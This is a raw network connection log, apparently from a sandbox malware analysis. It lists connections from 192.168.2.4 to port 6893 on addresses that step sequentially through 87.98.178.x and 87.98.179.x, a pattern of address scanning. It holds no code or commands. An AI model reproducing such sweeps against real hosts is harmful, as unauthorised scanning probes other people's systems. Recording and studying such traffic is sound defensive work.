                                                                                                        Sep 29, 2022 14:45:23.998049021 CEST585676893192.168.2.487.98.178.10
                                                                                                        Sep 29, 2022 14:45:23.998121023 CEST585676893192.168.2.487.98.178.11
                                                                                                        Sep 29, 2022 14:45:23.998222113 CEST585676893192.168.2.487.98.178.12
                                                                                                        Sep 29, 2022 14:45:23.998262882 CEST585676893192.168.2.487.98.178.13
                                                                                                        Sep 29, 2022 14:45:23.998317957 CEST585676893192.168.2.487.98.178.14
                                                                                                        Sep 29, 2022 14:45:23.998461962 CEST585676893192.168.2.487.98.178.15
                                                                                                        Sep 29, 2022 14:45:23.998526096 CEST585676893192.168.2.487.98.178.16
                                                                                                        Sep 29, 2022 14:45:23.998591900 CEST585676893192.168.2.487.98.178.18
                                                                                                        Sep 29, 2022 14:45:23.998657942 CEST585676893192.168.2.487.98.178.19
                                                                                                        Sep 29, 2022 14:45:23.998768091 CEST585676893192.168.2.487.98.178.20
                                                                                                        Sep 29, 2022 14:45:23.998773098 CEST585676893192.168.2.487.98.178.17
                                                                                                        Sep 29, 2022 14:45:23.998785973 CEST585676893192.168.2.487.98.178.21
                                                                                                        Sep 29, 2022 14:45:23.998862028 CEST585676893192.168.2.487.98.178.22
                                                                                                        Sep 29, 2022 14:45:23.998975039 CEST585676893192.168.2.487.98.178.23
                                                                                                        Sep 29, 2022 14:45:23.999030113 CEST585676893192.168.2.487.98.178.24
                                                                                                        Sep 29, 2022 14:45:23.999094009 CEST585676893192.168.2.487.98.178.25
                                                                                                        Sep 29, 2022 14:45:23.999169111 CEST585676893192.168.2.487.98.178.26
                                                                                                        Sep 29, 2022 14:45:23.999308109 CEST585676893192.168.2.487.98.178.27
                                                                                                        Sep 29, 2022 14:45:23.999408960 CEST585676893192.168.2.487.98.178.28
                                                                                                        Sep 29, 2022 14:45:23.999691963 CEST585676893192.168.2.487.98.178.30
                                                                                                        Sep 29, 2022 14:45:23.999758005 CEST585676893192.168.2.487.98.178.31
                                                                                                        Sep 29, 2022 14:45:23.999769926 CEST585676893192.168.2.487.98.178.29
                                                                                                        Sep 29, 2022 14:45:23.999855042 CEST585676893192.168.2.487.98.178.33
                                                                                                        Sep 29, 2022 14:45:23.999936104 CEST585676893192.168.2.487.98.178.32
                                                                                                        Sep 29, 2022 14:45:23.999952078 CEST585676893192.168.2.487.98.178.34
                                                                                                        Sep 29, 2022 14:45:24.000118971 CEST585676893192.168.2.487.98.178.35
                                                                                                        Sep 29, 2022 14:45:24.000169992 CEST585676893192.168.2.487.98.178.36
                                                                                                        Sep 29, 2022 14:45:24.000269890 CEST585676893192.168.2.487.98.178.37
                                                                                                        Sep 29, 2022 14:45:24.000446081 CEST585676893192.168.2.487.98.178.39
                                                                                                        Sep 29, 2022 14:45:24.000457048 CEST585676893192.168.2.487.98.178.38
                                                                                                        Sep 29, 2022 14:45:24.000530958 CEST585676893192.168.2.487.98.178.40
                                                                                                        Sep 29, 2022 14:45:24.000646114 CEST585676893192.168.2.487.98.178.41
                                                                                                        Sep 29, 2022 14:45:24.000713110 CEST585676893192.168.2.487.98.178.42
                                                                                                        Sep 29, 2022 14:45:24.000785112 CEST585676893192.168.2.487.98.178.43
                                                                                                        Sep 29, 2022 14:45:24.000941038 CEST585676893192.168.2.487.98.178.44
                                                                                                        Sep 29, 2022 14:45:24.001036882 CEST585676893192.168.2.487.98.178.45
                                                                                                        Sep 29, 2022 14:45:24.001158953 CEST585676893192.168.2.487.98.178.46
                                                                                                        Sep 29, 2022 14:45:24.001300097 CEST585676893192.168.2.487.98.178.47
                                                                                                        Sep 29, 2022 14:45:24.001364946 CEST585676893192.168.2.487.98.178.48
                                                                                                        Sep 29, 2022 14:45:24.001460075 CEST585676893192.168.2.487.98.178.49
                                                                                                        Sep 29, 2022 14:45:24.001632929 CEST585676893192.168.2.487.98.178.51
                                                                                                        Sep 29, 2022 14:45:24.001698017 CEST585676893192.168.2.487.98.178.52
                                                                                                        Sep 29, 2022 14:45:24.001714945 CEST585676893192.168.2.487.98.178.50
                                                                                                        Sep 29, 2022 14:45:24.001770020 CEST585676893192.168.2.487.98.178.53
                                                                                                        Sep 29, 2022 14:45:24.001838923 CEST585676893192.168.2.487.98.178.54
                                                                                                        Sep 29, 2022 14:45:24.001951933 CEST585676893192.168.2.487.98.178.55
                                                                                                        Sep 29, 2022 14:45:24.002043009 CEST585676893192.168.2.487.98.178.56
                                                                                                        Sep 29, 2022 14:45:24.002115011 CEST585676893192.168.2.487.98.178.57
                                                                                                        Sep 29, 2022 14:45:24.002238989 CEST585676893192.168.2.487.98.178.58
                                                                                                        Sep 29, 2022 14:45:24.002311945 CEST585676893192.168.2.487.98.178.59
                                                                                                        Sep 29, 2022 14:45:24.002388000 CEST585676893192.168.2.487.98.178.60
                                                                                                        Sep 29, 2022 14:45:24.002502918 CEST585676893192.168.2.487.98.178.61
                                                                                                        Sep 29, 2022 14:45:24.002667904 CEST585676893192.168.2.487.98.178.63
                                                                                                        Sep 29, 2022 14:45:24.002774000 CEST585676893192.168.2.487.98.178.62
                                                                                                        Sep 29, 2022 14:45:24.002774954 CEST585676893192.168.2.487.98.178.64
                                                                                                        Sep 29, 2022 14:45:24.002932072 CEST585676893192.168.2.487.98.178.65
                                                                                                        Sep 29, 2022 14:45:24.003022909 CEST585676893192.168.2.487.98.178.66
                                                                                                        Sep 29, 2022 14:45:24.003170013 CEST585676893192.168.2.487.98.178.68
                                                                                                        Sep 29, 2022 14:45:24.003269911 CEST585676893192.168.2.487.98.178.69
                                                                                                        Sep 29, 2022 14:45:24.003412008 CEST585676893192.168.2.487.98.178.70
                                                                                                        Sep 29, 2022 14:45:24.003462076 CEST585676893192.168.2.487.98.178.71
                                                                                                        Sep 29, 2022 14:45:24.003463984 CEST585676893192.168.2.487.98.178.67
                                                                                                        Sep 29, 2022 14:45:24.003562927 CEST585676893192.168.2.487.98.178.72
                                                                                                        Sep 29, 2022 14:45:24.003663063 CEST585676893192.168.2.487.98.178.73
                                                                                                        Sep 29, 2022 14:45:24.003732920 CEST585676893192.168.2.487.98.178.74
                                                                                                        Sep 29, 2022 14:45:24.003810883 CEST585676893192.168.2.487.98.178.75
                                                                                                        Sep 29, 2022 14:45:24.003910065 CEST585676893192.168.2.487.98.178.76
                                                                                                        Sep 29, 2022 14:45:24.003998041 CEST585676893192.168.2.487.98.178.77
                                                                                                        Sep 29, 2022 14:45:24.004112005 CEST585676893192.168.2.487.98.178.78
                                                                                                        Sep 29, 2022 14:45:24.004301071 CEST585676893192.168.2.487.98.178.80
                                                                                                        Sep 29, 2022 14:45:24.004339933 CEST585676893192.168.2.487.98.178.79
                                                                                                        Sep 29, 2022 14:45:24.004400969 CEST585676893192.168.2.487.98.178.81
                                                                                                        Sep 29, 2022 14:45:24.004533052 CEST585676893192.168.2.487.98.178.83
                                                                                                        Sep 29, 2022 14:45:24.004625082 CEST585676893192.168.2.487.98.178.84
                                                                                                        Sep 29, 2022 14:45:24.004735947 CEST585676893192.168.2.487.98.178.85
                                                                                                        Sep 29, 2022 14:45:24.004813910 CEST585676893192.168.2.487.98.178.86
                                                                                                        Sep 29, 2022 14:45:24.004939079 CEST585676893192.168.2.487.98.178.87
                                                                                                        Sep 29, 2022 14:45:24.004991055 CEST585676893192.168.2.487.98.178.82
                                                                                                        Sep 29, 2022 14:45:24.005014896 CEST585676893192.168.2.487.98.178.88
                                                                                                        Sep 29, 2022 14:45:24.005137920 CEST585676893192.168.2.487.98.178.89
                                                                                                        Sep 29, 2022 14:45:24.005234957 CEST585676893192.168.2.487.98.178.90
                                                                                                        Sep 29, 2022 14:45:24.005310059 CEST585676893192.168.2.487.98.178.91
                                                                                                        Sep 29, 2022 14:45:24.005393982 CEST585676893192.168.2.487.98.178.92
                                                                                                        Sep 29, 2022 14:45:24.005469084 CEST585676893192.168.2.487.98.178.93
                                                                                                        Sep 29, 2022 14:45:24.005690098 CEST585676893192.168.2.487.98.178.95
                                                                                                        Sep 29, 2022 14:45:24.005717039 CEST585676893192.168.2.487.98.178.94
                                                                                                        Sep 29, 2022 14:45:24.005800962 CEST585676893192.168.2.487.98.178.96
                                                                                                        Sep 29, 2022 14:45:24.005902052 CEST585676893192.168.2.487.98.178.97
                                                                                                        Sep 29, 2022 14:45:24.005989075 CEST585676893192.168.2.487.98.178.98
                                                                                                        Sep 29, 2022 14:45:24.006165028 CEST585676893192.168.2.487.98.178.100
                                                                                                        Sep 29, 2022 14:45:24.006263018 CEST585676893192.168.2.487.98.178.101
                                                                                                        Sep 29, 2022 14:45:24.006373882 CEST585676893192.168.2.487.98.178.102
                                                                                                        Sep 29, 2022 14:45:24.006439924 CEST585676893192.168.2.487.98.178.103
                                                                                                        Sep 29, 2022 14:45:24.006525040 CEST585676893192.168.2.487.98.178.104
                                                                                                        Sep 29, 2022 14:45:24.006632090 CEST585676893192.168.2.487.98.178.105
                                                                                                        Sep 29, 2022 14:45:24.006707907 CEST585676893192.168.2.487.98.178.106
                                                                                                        Sep 29, 2022 14:45:24.006818056 CEST585676893192.168.2.487.98.178.99
                                                                                                        Sep 29, 2022 14:45:24.006899118 CEST585676893192.168.2.487.98.178.107
                                                                                                        Sep 29, 2022 14:45:24.007091999 CEST585676893192.168.2.487.98.178.109
                                                                                                        Sep 29, 2022 14:45:24.007147074 CEST585676893192.168.2.487.98.178.108
                                                                                                        Sep 29, 2022 14:45:24.007184029 CEST585676893192.168.2.487.98.178.110
                                                                                                        Sep 29, 2022 14:45:24.007272959 CEST585676893192.168.2.487.98.178.111
                                                                                                        Sep 29, 2022 14:45:24.007450104 CEST585676893192.168.2.487.98.178.112
                                                                                                        Sep 29, 2022 14:45:24.007560968 CEST585676893192.168.2.487.98.178.113
                                                                                                        Sep 29, 2022 14:45:24.007615089 CEST585676893192.168.2.487.98.178.115
                                                                                                        Sep 29, 2022 14:45:24.007714033 CEST585676893192.168.2.487.98.178.116
                                                                                                        Sep 29, 2022 14:45:24.007791996 CEST585676893192.168.2.487.98.178.114
                                                                                                        Sep 29, 2022 14:45:24.007797956 CEST585676893192.168.2.487.98.178.117
                                                                                                        Sep 29, 2022 14:45:24.007880926 CEST585676893192.168.2.487.98.178.118
                                                                                                        Sep 29, 2022 14:45:24.007997036 CEST585676893192.168.2.487.98.178.119
                                                                                                        Sep 29, 2022 14:45:24.008075953 CEST585676893192.168.2.487.98.178.120
                                                                                                        Sep 29, 2022 14:45:24.008167982 CEST585676893192.168.2.487.98.178.121
                                                                                                        Sep 29, 2022 14:45:24.008399010 CEST585676893192.168.2.487.98.178.122
                                                                                                        Sep 29, 2022 14:45:24.008399010 CEST585676893192.168.2.487.98.178.123
                                                                                                        Sep 29, 2022 14:45:24.008491993 CEST585676893192.168.2.487.98.178.124
                                                                                                        Sep 29, 2022 14:45:24.008897066 CEST585676893192.168.2.487.98.178.126
                                                                                                        Sep 29, 2022 14:45:24.008927107 CEST585676893192.168.2.487.98.178.127
                                                                                                        Sep 29, 2022 14:45:24.008939981 CEST585676893192.168.2.487.98.178.128
                                                                                                        Sep 29, 2022 14:45:24.009013891 CEST585676893192.168.2.487.98.178.125
                                                                                                        Sep 29, 2022 14:45:24.009013891 CEST585676893192.168.2.487.98.178.129
                                                                                                        Sep 29, 2022 14:45:24.010622025 CEST585676893192.168.2.487.98.178.130
                                                                                                        Sep 29, 2022 14:45:24.010726929 CEST585676893192.168.2.487.98.178.131
                                                                                                        Sep 29, 2022 14:45:24.010849953 CEST585676893192.168.2.487.98.178.132
                                                                                                        Sep 29, 2022 14:45:24.011018038 CEST585676893192.168.2.487.98.178.133
                                                                                                        Sep 29, 2022 14:45:24.011116982 CEST585676893192.168.2.487.98.178.134
                                                                                                        Sep 29, 2022 14:45:24.011198044 CEST585676893192.168.2.487.98.178.135
                                                                                                        Sep 29, 2022 14:45:24.011281967 CEST585676893192.168.2.487.98.178.136
                                                                                                        Sep 29, 2022 14:45:24.011367083 CEST585676893192.168.2.487.98.178.137
                                                                                                        Sep 29, 2022 14:45:24.011447906 CEST585676893192.168.2.487.98.178.138
                                                                                                        Sep 29, 2022 14:45:24.011552095 CEST585676893192.168.2.487.98.178.139
                                                                                                        Sep 29, 2022 14:45:24.011610031 CEST585676893192.168.2.487.98.178.140
                                                                                                        Sep 29, 2022 14:45:24.011868000 CEST585676893192.168.2.487.98.178.143
                                                                                                        Sep 29, 2022 14:45:24.011950016 CEST585676893192.168.2.487.98.178.142
                                                                                                        Sep 29, 2022 14:45:24.011950970 CEST585676893192.168.2.487.98.178.144
                                                                                                        Sep 29, 2022 14:45:24.012020111 CEST585676893192.168.2.487.98.178.145
                                                                                                        Sep 29, 2022 14:45:24.012103081 CEST585676893192.168.2.487.98.178.146
                                                                                                        Sep 29, 2022 14:45:24.012208939 CEST585676893192.168.2.487.98.178.141
                                                                                                        Sep 29, 2022 14:45:24.012208939 CEST585676893192.168.2.487.98.178.147
                                                                                                        Sep 29, 2022 14:45:24.012274027 CEST585676893192.168.2.487.98.178.148
                                                                                                        Sep 29, 2022 14:45:24.012471914 CEST585676893192.168.2.487.98.178.149
                                                                                                        Sep 29, 2022 14:45:24.012540102 CEST585676893192.168.2.487.98.178.150
                                                                                                        Sep 29, 2022 14:45:24.012761116 CEST585676893192.168.2.487.98.178.151
                                                                                                        Sep 29, 2022 14:45:24.012761116 CEST585676893192.168.2.487.98.178.152
                                                                                                        Sep 29, 2022 14:45:24.012834072 CEST585676893192.168.2.487.98.178.153
                                                                                                        Sep 29, 2022 14:45:24.012929916 CEST585676893192.168.2.487.98.178.154
                                                                                                        Sep 29, 2022 14:45:24.013694048 CEST585676893192.168.2.487.98.178.155
                                                                                                        Sep 29, 2022 14:45:24.013799906 CEST585676893192.168.2.487.98.178.156
                                                                                                        Sep 29, 2022 14:45:24.013850927 CEST585676893192.168.2.487.98.178.157
                                                                                                        Sep 29, 2022 14:45:24.013940096 CEST585676893192.168.2.487.98.178.158
                                                                                                        Sep 29, 2022 14:45:24.014041901 CEST585676893192.168.2.487.98.178.159
                                                                                                        Sep 29, 2022 14:45:24.014107943 CEST585676893192.168.2.487.98.178.160
                                                                                                        Sep 29, 2022 14:45:24.014488935 CEST585676893192.168.2.487.98.178.163
                                                                                                        Sep 29, 2022 14:45:24.014596939 CEST585676893192.168.2.487.98.178.164
                                                                                                        Sep 29, 2022 14:45:24.014672995 CEST585676893192.168.2.487.98.178.165
                                                                                                        Sep 29, 2022 14:45:24.014674902 CEST585676893192.168.2.487.98.178.161
                                                                                                        Sep 29, 2022 14:45:24.014678001 CEST585676893192.168.2.487.98.178.162
                                                                                                        Sep 29, 2022 14:45:24.014760017 CEST585676893192.168.2.487.98.178.166
                                                                                                        Sep 29, 2022 14:45:24.014838934 CEST585676893192.168.2.487.98.178.167
                                                                                                        Sep 29, 2022 14:45:24.014926910 CEST585676893192.168.2.487.98.178.168
                                                                                                        Sep 29, 2022 14:45:24.015027046 CEST585676893192.168.2.487.98.178.169
                                                                                                        Sep 29, 2022 14:45:24.015106916 CEST585676893192.168.2.487.98.178.170
                                                                                                        Sep 29, 2022 14:45:24.015300989 CEST585676893192.168.2.487.98.178.171
                                                                                                        Sep 29, 2022 14:45:24.015356064 CEST585676893192.168.2.487.98.178.172
                                                                                                        Sep 29, 2022 14:45:24.015458107 CEST585676893192.168.2.487.98.178.173
                                                                                                        Sep 29, 2022 14:45:24.015594959 CEST585676893192.168.2.487.98.178.174
                                                                                                        Sep 29, 2022 14:45:24.015656948 CEST585676893192.168.2.487.98.178.175
                                                                                                        Sep 29, 2022 14:45:24.015840054 CEST585676893192.168.2.487.98.178.177
                                                                                                        Sep 29, 2022 14:45:24.015913963 CEST585676893192.168.2.487.98.178.178
                                                                                                        Sep 29, 2022 14:45:24.016046047 CEST585676893192.168.2.487.98.178.179
                                                                                                        Sep 29, 2022 14:45:24.016103983 CEST585676893192.168.2.487.98.178.180
                                                                                                        Sep 29, 2022 14:45:24.016225100 CEST585676893192.168.2.487.98.178.181
                                                                                                        Sep 29, 2022 14:45:24.016305923 CEST585676893192.168.2.487.98.178.182
                                                                                                        Sep 29, 2022 14:45:24.016403913 CEST585676893192.168.2.487.98.178.183
                                                                                                        Sep 29, 2022 14:45:24.016422987 CEST585676893192.168.2.487.98.178.176
                                                                                                        Sep 29, 2022 14:45:24.016490936 CEST585676893192.168.2.487.98.178.184
                                                                                                        Sep 29, 2022 14:45:24.016634941 CEST585676893192.168.2.487.98.178.185
                                                                                                        Sep 29, 2022 14:45:24.016756058 CEST585676893192.168.2.487.98.178.186
                                                                                                        Sep 29, 2022 14:45:24.016841888 CEST585676893192.168.2.487.98.178.187
                                                                                                        Sep 29, 2022 14:45:24.017020941 CEST585676893192.168.2.487.98.178.189
                                                                                                        Sep 29, 2022 14:45:24.017119884 CEST585676893192.168.2.487.98.178.190
                                                                                                        Sep 29, 2022 14:45:24.017240047 CEST585676893192.168.2.487.98.178.191
                                                                                                        Sep 29, 2022 14:45:24.017316103 CEST585676893192.168.2.487.98.178.192
                                                                                                        Sep 29, 2022 14:45:24.017471075 CEST585676893192.168.2.487.98.178.193
                                                                                                        Sep 29, 2022 14:45:24.017497063 CEST585676893192.168.2.487.98.178.188
                                                                                                        Sep 29, 2022 14:45:24.017497063 CEST585676893192.168.2.487.98.178.194
                                                                                                        Sep 29, 2022 14:45:24.017623901 CEST585676893192.168.2.487.98.178.195
                                                                                                        Sep 29, 2022 14:45:24.017741919 CEST585676893192.168.2.487.98.178.196
                                                                                                        Sep 29, 2022 14:45:24.017828941 CEST585676893192.168.2.487.98.178.197
                                                                                                        Sep 29, 2022 14:45:24.017923117 CEST585676893192.168.2.487.98.178.198
                                                                                                        Sep 29, 2022 14:45:24.018012047 CEST585676893192.168.2.487.98.178.199
                                                                                                        Sep 29, 2022 14:45:24.018096924 CEST585676893192.168.2.487.98.178.200
                                                                                                        Sep 29, 2022 14:45:24.018186092 CEST585676893192.168.2.487.98.178.201
                                                                                                        Sep 29, 2022 14:45:24.018274069 CEST585676893192.168.2.487.98.178.202
                                                                                                        Sep 29, 2022 14:45:24.018368006 CEST585676893192.168.2.487.98.178.203
                                                                                                        Sep 29, 2022 14:45:24.018445015 CEST585676893192.168.2.487.98.178.204
                                                                                                        Sep 29, 2022 14:45:24.018543005 CEST585676893192.168.2.487.98.178.205
                                                                                                        Sep 29, 2022 14:45:24.018698931 CEST585676893192.168.2.487.98.178.207
                                                                                                        Sep 29, 2022 14:45:24.018821955 CEST585676893192.168.2.487.98.178.206
                                                                                                        Sep 29, 2022 14:45:24.018821955 CEST585676893192.168.2.487.98.178.208
                                                                                                        Sep 29, 2022 14:45:24.018868923 CEST585676893192.168.2.487.98.178.209
                                                                                                        Sep 29, 2022 14:45:24.018944025 CEST585676893192.168.2.487.98.178.210
                                                                                                        Sep 29, 2022 14:45:24.019279957 CEST585676893192.168.2.487.98.178.212
                                                                                                        Sep 29, 2022 14:45:24.019335032 CEST585676893192.168.2.487.98.178.211
                                                                                                        Sep 29, 2022 14:45:24.019412041 CEST585676893192.168.2.487.98.178.213
                                                                                                        Sep 29, 2022 14:45:24.019577026 CEST585676893192.168.2.487.98.178.214
                                                                                                        Sep 29, 2022 14:45:24.019684076 CEST585676893192.168.2.487.98.178.215
                                                                                                        Sep 29, 2022 14:45:24.019854069 CEST585676893192.168.2.487.98.178.216
                                                                                                        Sep 29, 2022 14:45:24.019948006 CEST585676893192.168.2.487.98.178.217
                                                                                                        Sep 29, 2022 14:45:24.020057917 CEST585676893192.168.2.487.98.178.218
                                                                                                        Sep 29, 2022 14:45:24.020139933 CEST585676893192.168.2.487.98.178.219
                                                                                                        Sep 29, 2022 14:45:24.020240068 CEST585676893192.168.2.487.98.178.220
                                                                                                        Sep 29, 2022 14:45:24.020309925 CEST585676893192.168.2.487.98.178.221
                                                                                                        Sep 29, 2022 14:45:24.020407915 CEST585676893192.168.2.487.98.178.222
                                                                                                        Sep 29, 2022 14:45:24.020514965 CEST585676893192.168.2.487.98.178.223
                                                                                                        Sep 29, 2022 14:45:24.020597935 CEST585676893192.168.2.487.98.178.224
                                                                                                        Sep 29, 2022 14:45:24.020821095 CEST585676893192.168.2.487.98.178.226
                                                                                                        Sep 29, 2022 14:45:24.020865917 CEST585676893192.168.2.487.98.178.227
                                                                                                        Sep 29, 2022 14:45:24.020875931 CEST585676893192.168.2.487.98.178.225
                                                                                                        Sep 29, 2022 14:45:24.020967960 CEST585676893192.168.2.487.98.178.228
                                                                                                        Sep 29, 2022 14:45:24.021039009 CEST585676893192.168.2.487.98.178.229
                                                                                                        Sep 29, 2022 14:45:24.021126986 CEST585676893192.168.2.487.98.178.230
                                                                                                        Sep 29, 2022 14:45:24.021229982 CEST585676893192.168.2.487.98.178.231
                                                                                                        Sep 29, 2022 14:45:24.021312952 CEST585676893192.168.2.487.98.178.232
                                                                                                        Sep 29, 2022 14:45:24.021404982 CEST585676893192.168.2.487.98.178.233
                                                                                                        Sep 29, 2022 14:45:24.021598101 CEST585676893192.168.2.487.98.178.234
                                                                                                        Sep 29, 2022 14:45:24.021709919 CEST585676893192.168.2.487.98.178.235
                                                                                                        Sep 29, 2022 14:45:24.021783113 CEST585676893192.168.2.487.98.178.236
                                                                                                        Sep 29, 2022 14:45:24.022015095 CEST585676893192.168.2.487.98.178.238
                                                                                                        Sep 29, 2022 14:45:24.022099018 CEST585676893192.168.2.487.98.178.239
                                                                                                        Sep 29, 2022 14:45:24.022273064 CEST585676893192.168.2.487.98.178.241
                                                                                                        Sep 29, 2022 14:45:24.022344112 CEST585676893192.168.2.487.98.178.242
                                                                                                        Sep 29, 2022 14:45:24.022449970 CEST585676893192.168.2.487.98.178.237
                                                                                                        Sep 29, 2022 14:45:24.022449970 CEST585676893192.168.2.487.98.178.243
                                                                                                        Sep 29, 2022 14:45:24.022516966 CEST585676893192.168.2.487.98.178.244
                                                                                                        Sep 29, 2022 14:45:24.022613049 CEST585676893192.168.2.487.98.178.245
                                                                                                        Sep 29, 2022 14:45:24.022674084 CEST585676893192.168.2.487.98.178.246
                                                                                                        Sep 29, 2022 14:45:24.022757053 CEST585676893192.168.2.487.98.178.247
                                                                                                        Sep 29, 2022 14:45:24.022840977 CEST585676893192.168.2.487.98.178.248
                                                                                                        Sep 29, 2022 14:45:24.022902966 CEST585676893192.168.2.487.98.178.240
                                                                                                        Sep 29, 2022 14:45:24.022985935 CEST585676893192.168.2.487.98.178.249
                                                                                                        Sep 29, 2022 14:45:24.023107052 CEST585676893192.168.2.487.98.178.250
                                                                                                        Sep 29, 2022 14:45:24.023154974 CEST585676893192.168.2.487.98.178.251
                                                                                                        Sep 29, 2022 14:45:24.023308992 CEST585676893192.168.2.487.98.178.252
                                                                                                        Sep 29, 2022 14:45:24.023384094 CEST585676893192.168.2.487.98.178.253
                                                                                                        Sep 29, 2022 14:45:24.023473024 CEST585676893192.168.2.487.98.178.254
                                                                                                        Sep 29, 2022 14:45:25.042316914 CEST585676893192.168.2.487.98.179.0
                                                                                                        Sep 29, 2022 14:45:25.042402983 CEST585676893192.168.2.487.98.179.1
                                                                                                        Sep 29, 2022 14:45:25.042558908 CEST585676893192.168.2.487.98.179.2
                                                                                                        Sep 29, 2022 14:45:25.042612076 CEST585676893192.168.2.487.98.179.3
                                                                                                        Sep 29, 2022 14:45:25.042706966 CEST585676893192.168.2.487.98.179.4
                                                                                                        Sep 29, 2022 14:45:25.042799950 CEST585676893192.168.2.487.98.178.255
                                                                                                        Sep 29, 2022 14:45:25.042799950 CEST585676893192.168.2.487.98.179.5
                                                                                                        Sep 29, 2022 14:45:25.042996883 CEST585676893192.168.2.487.98.179.7
                                                                                                        Sep 29, 2022 14:45:25.043106079 CEST585676893192.168.2.487.98.179.6
                                                                                                        Sep 29, 2022 14:45:25.043181896 CEST585676893192.168.2.487.98.179.8
                                                                                                        Sep 29, 2022 14:45:25.043226957 CEST585676893192.168.2.487.98.179.9
                                                                                                        Sep 29, 2022 14:45:25.043400049 CEST585676893192.168.2.487.98.179.11
                                                                                                        Sep 29, 2022 14:45:25.043495893 CEST585676893192.168.2.487.98.179.12
                                                                                                        Sep 29, 2022 14:45:25.043597937 CEST585676893192.168.2.487.98.179.13
                                                                                                        Sep 29, 2022 14:45:25.043685913 CEST585676893192.168.2.487.98.179.14
                                                                                                        Sep 29, 2022 14:45:25.043853998 CEST585676893192.168.2.487.98.179.15
                                                                                                        Sep 29, 2022 14:45:25.043879032 CEST585676893192.168.2.487.98.179.16
                                                                                                        Sep 29, 2022 14:45:25.044043064 CEST585676893192.168.2.487.98.179.17
                                                                                                        Sep 29, 2022 14:45:25.044076920 CEST585676893192.168.2.487.98.179.18
                                                                                                        Sep 29, 2022 14:45:25.044183969 CEST585676893192.168.2.487.98.179.19
                                                                                                        Sep 29, 2022 14:45:25.044380903 CEST585676893192.168.2.487.98.179.10
                                                                                                        Sep 29, 2022 14:45:25.044380903 CEST585676893192.168.2.487.98.179.20
                                                                                                        Sep 29, 2022 14:45:25.044424057 CEST585676893192.168.2.487.98.179.21
                                                                                                        Sep 29, 2022 14:45:25.044616938 CEST585676893192.168.2.487.98.179.22
                                                                                                        Sep 29, 2022 14:45:25.044747114 CEST585676893192.168.2.487.98.179.23
                                                                                                        Sep 29, 2022 14:45:25.044871092 CEST585676893192.168.2.487.98.179.24
                                                                                                        Sep 29, 2022 14:45:25.044961929 CEST585676893192.168.2.487.98.179.25
                                                                                                        Sep 29, 2022 14:45:25.045063972 CEST585676893192.168.2.487.98.179.26
                                                                                                        Sep 29, 2022 14:45:25.045272112 CEST585676893192.168.2.487.98.179.28
                                                                                                        Sep 29, 2022 14:45:25.045375109 CEST585676893192.168.2.487.98.179.29
                                                                                                        Sep 29, 2022 14:45:25.045480013 CEST585676893192.168.2.487.98.179.30
                                                                                                        Sep 29, 2022 14:45:25.045571089 CEST585676893192.168.2.487.98.179.31
                                                                                                        Sep 29, 2022 14:45:25.045671940 CEST585676893192.168.2.487.98.179.27
                                                                                                        Sep 29, 2022 14:45:25.045686007 CEST585676893192.168.2.487.98.179.32
                                                                                                        Sep 29, 2022 14:45:25.045833111 CEST585676893192.168.2.487.98.179.33
                                                                                                        Sep 29, 2022 14:45:25.045981884 CEST585676893192.168.2.487.98.179.34
                                                                                                        Sep 29, 2022 14:45:25.046118975 CEST585676893192.168.2.487.98.179.35
                                                                                                        Sep 29, 2022 14:45:25.046238899 CEST585676893192.168.2.487.98.179.36
                                                                                                        Sep 29, 2022 14:45:25.046423912 CEST585676893192.168.2.487.98.179.37
                                                                                                        Sep 29, 2022 14:45:25.047624111 CEST585676893192.168.2.487.98.179.38
                                                                                                        Sep 29, 2022 14:45:25.047739029 CEST585676893192.168.2.487.98.179.39
                                                                                                        Sep 29, 2022 14:45:25.048155069 CEST585676893192.168.2.487.98.179.40
                                                                                                        Sep 29, 2022 14:45:25.048332930 CEST585676893192.168.2.487.98.179.41
                                                                                                        Sep 29, 2022 14:45:25.048475027 CEST585676893192.168.2.487.98.179.42
                                                                                                        Sep 29, 2022 14:45:25.048635006 CEST585676893192.168.2.487.98.179.43
                                                                                                        Sep 29, 2022 14:45:25.048784018 CEST585676893192.168.2.487.98.179.44
                                                                                                        Sep 29, 2022 14:45:25.048942089 CEST585676893192.168.2.487.98.179.45
                                                                                                        Sep 29, 2022 14:45:25.049088955 CEST585676893192.168.2.487.98.179.46
                                                                                                        Sep 29, 2022 14:45:25.049261093 CEST585676893192.168.2.487.98.179.47
                                                                                                        Sep 29, 2022 14:45:25.049360037 CEST585676893192.168.2.487.98.179.48
                                                                                                        Sep 29, 2022 14:45:25.049491882 CEST585676893192.168.2.487.98.179.49
                                                                                                        Sep 29, 2022 14:45:25.049624920 CEST585676893192.168.2.487.98.179.50
                                                                                                        Sep 29, 2022 14:45:25.049855947 CEST585676893192.168.2.487.98.179.51
                                                                                                        Sep 29, 2022 14:45:25.050080061 CEST585676893192.168.2.487.98.179.52
                                                                                                        Sep 29, 2022 14:45:25.050132036 CEST585676893192.168.2.487.98.179.53
                                                                                                        Sep 29, 2022 14:45:25.050246954 CEST585676893192.168.2.487.98.179.54
                                                                                                        Sep 29, 2022 14:45:25.050347090 CEST585676893192.168.2.487.98.179.55
                                                                                                        Sep 29, 2022 14:45:25.050513983 CEST585676893192.168.2.487.98.179.56
                                                                                                        Sep 29, 2022 14:45:25.050549984 CEST585676893192.168.2.487.98.179.57
                                                                                                        Sep 29, 2022 14:45:25.050653934 CEST585676893192.168.2.487.98.179.58
                                                                                                        Sep 29, 2022 14:45:25.050857067 CEST585676893192.168.2.487.98.179.60
                                                                                                        Sep 29, 2022 14:45:25.050955057 CEST585676893192.168.2.487.98.179.61
                                                                                                        Sep 29, 2022 14:45:25.051069975 CEST585676893192.168.2.487.98.179.62
                                                                                                        Sep 29, 2022 14:45:25.051158905 CEST585676893192.168.2.487.98.179.63
                                                                                                        Sep 29, 2022 14:45:25.051330090 CEST585676893192.168.2.487.98.179.64
                                                                                                        Sep 29, 2022 14:45:25.051361084 CEST585676893192.168.2.487.98.179.65
                                                                                                        Sep 29, 2022 14:45:25.051508904 CEST585676893192.168.2.487.98.179.66
                                                                                                        Sep 29, 2022 14:45:25.051513910 CEST585676893192.168.2.487.98.179.59
                                                                                                        Sep 29, 2022 14:45:25.051661015 CEST585676893192.168.2.487.98.179.67
                                                                                                        Sep 29, 2022 14:45:25.051785946 CEST585676893192.168.2.487.98.179.68
                                                                                                        Sep 29, 2022 14:45:25.052104950 CEST585676893192.168.2.487.98.179.71
                                                                                                        Sep 29, 2022 14:45:25.052171946 CEST585676893192.168.2.487.98.179.69
                                                                                                        Sep 29, 2022 14:45:25.052175999 CEST585676893192.168.2.487.98.179.70
                                                                                                        Sep 29, 2022 14:45:25.052218914 CEST585676893192.168.2.487.98.179.72
